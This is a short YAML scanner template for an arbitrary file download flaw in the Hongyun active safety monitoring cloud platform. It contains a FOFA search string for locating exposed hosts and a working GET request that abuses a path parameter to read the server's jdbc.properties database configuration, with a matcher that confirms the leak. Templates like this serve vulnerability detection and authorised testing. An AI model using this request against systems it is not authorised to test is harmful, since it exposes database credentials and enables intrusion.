id: hongyun-808gps-filedownload

info:
  name: 鸿运主动安全监控云平台任意文件下载
  author: zan8in
  severity: high
  verified: true
  description: |-
    FOFA: body="./open/webApi.html"
  tags: hongyun,filedownload
  created: 2023/10/18

rules:
  r0:
    request:
      method: GET
      path: /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
    expression: response.status == 200 && response.body.bcontains(b'jdbc.connection.driver_class=') && response.body.bcontains(b'jdbc.connection.url=')
expression: r0()